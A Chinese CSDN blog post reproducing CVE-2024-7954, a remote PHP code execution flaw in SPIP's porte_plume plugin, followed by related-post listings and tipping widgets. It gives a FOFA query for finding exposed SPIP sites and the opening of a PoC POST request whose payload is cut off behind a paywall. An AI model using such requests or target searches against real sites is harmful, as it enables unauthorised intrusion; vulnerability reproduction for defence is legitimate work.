SPIP porte_plume插件 远程代码执行漏洞复现(CVE-2024-7954)

已于 2024-08-28 17:56:26 修改
阅读量1.3k 收藏 1
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-28 17:56:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/141646445
版权

0x01 产品简介

SPIP 的 porte_plume插件是一款专为SPIP平台设计的插件,主要用于增强文本编辑功能。它通过提供额外的编辑工具和预览功能等方式,帮助用户更高效地完成文本编辑工作。

0x02 漏洞概述

SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞,远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。

0x03 复现环境

FOFA:icon_hash=="-1224668706"

0x04 漏洞复现

PoC

POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

data=AA_[<img2>->URL`<?
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
SPIP存在远程代码执行漏洞CVE-2024-7954 附POC
nnn2188185的博客
09-03 81
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发SPIP是SPIP开源的一个用于创建 Internet 站点的免费软件。
SPIP插件porte_plume PHP任意执行漏洞(CVE-2024-7954)
iSee857的博客
08-28 548
SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。关闭互联网暴露面或接口设置访问权限。
SPIP远程代码执行漏洞(CVE-2023-27372)
holyxp的博客
07-14 2126
下载链接:https://pan.baidu.com/s/1kCG5D4PMwY5wKeR47yL6iA?_pass),重置密码时 protege_champ()函数没有对序列化字符串进行过滤,从而触发命令执行漏洞。2、命令执行失败:(1)看一下禁用函数。(2)更换命令执行函数。(4)系统环境问题。3、响应包搜索id='oubli’就是命令执行的结果。1、注意看清目标是什么系统,不一定只是Linux。漏洞存在与密码重置功能中(漏洞点位url:/**FOFA语句:**app=“SPIP”
漏洞复现SPIP porte_plume插件 远程代码执行漏洞(CVE-2024-7954)
qq_39894062的博客
09-12 473
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
php定时执行代码漏洞_PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
weixin_39684235的博客
12-24 88
作者:LoRexxar'@知道创宇404实验室时间:2019年10月25日国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年10月23日,github公开漏洞相关的详情以及exp。当nginx配置不当时,会导致php-fpm远程任意代码执行。下面我们就来一点点看看漏洞的详细分析,文章中漏洞分析部...
织女星开发板使用RISC-V核驱动GPIO
whik1194的博客
12-22 1036
文章目录前言准备工作寄存器简介GPIO配置PCR寄存器GPIO控制寄存器库函数简介PORT_SetPinConfigPORT_SetPinMuxGPIO_PinInitGPIO_WritePinOutputGPIO_TogglePinsOutputGPIO_ReadPinInputRGB LED的初始化led_driver.c文件内容led_driver.h文件内容板载按键初始化button_dr...
Pronto Intervento Apertura Porte-crx插件
04-03
语言:English 打开锁和修复端口ARMORATE 我们重新启动,打开和替换任何类型的锁定或路由。 安装安全锁。 致电我们修理或更换装甲门。 我们介入任何品牌和类型。 如果滚动百叶窗和百叶窗或立即锁定呼叫。...
PIC单片机应用开发典型模块-第四章程序.doc
11-21
首先,代码中定义了一些重要的变量和常量,它们用于存储波形的相关参数。例如,`TEMP0TIME`、`TEMP0CONST`、`TEMP0DOTEQU`和`TEMP0OUTEQU`分别用于存储方波的次数、常数、点数和输出值。类似的,`TEMP1TIME`、`TEMP1...
Mon Swap-crx插件
03-24
普林西比(Principe):应用连接24h / 24和7j / 7 au porte-clefs交换。 GPS搬运工les的辅助处置申请书仍在继续。 行使自给自足权后,您将享有自理和自给自足的权利。 可以个性化的形式,例如门禁,夹扣和手镯,都...
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 783
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1217
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 761
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
weixin_64446270的博客
09-27 1466
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
安全服务面试
m0_74402888的博客
09-28 666
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
等保测评:企业数字安全的坚实盾牌
最新发布
w13359990065的博客
09-30 1699
据权威机构统计,未通过等保测评的企业在遭遇网络安全事件时,其数据泄露风险高出已通过企业近30%,这不仅直接威胁到企业的核心资产安全,还可能导致品牌信誉的严重受损。以某知名电商企业为例,因忽视等保测评,其支付系统曾遭受黑客攻击,导致大量用户信息泄露,最终不仅面临巨额罚款,还失去了大量客户的信任,市场份额一落千丈。以某知名电商企业为例,其在一次等保测评中发现,其支付系统存在一处严重的SQL注入漏洞,该漏洞允许攻击者通过构造特定的输入参数,绕过系统验证,直接访问数据库,进而获取敏感信息。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 838
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
什么是“0day漏洞”?
分享关于Java编程、数据库管理和信息安全方面的最佳实践
09-29 612
0day漏洞是信息安全中的“幽灵”,因为它的隐蔽性和破坏性往往超出我们的预期。虽然普通用户和企业无法完全规避0day漏洞,但通过保持良好的安全习惯和使用合适的防护工具,可以在一定程度上降低受到0day攻击的风险。信息安全永远在变,防护措施也需要不断更新。在快速发展的网络环境中,我们只有时刻保持警惕,才能最大限度地保护我们的数据和隐私。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值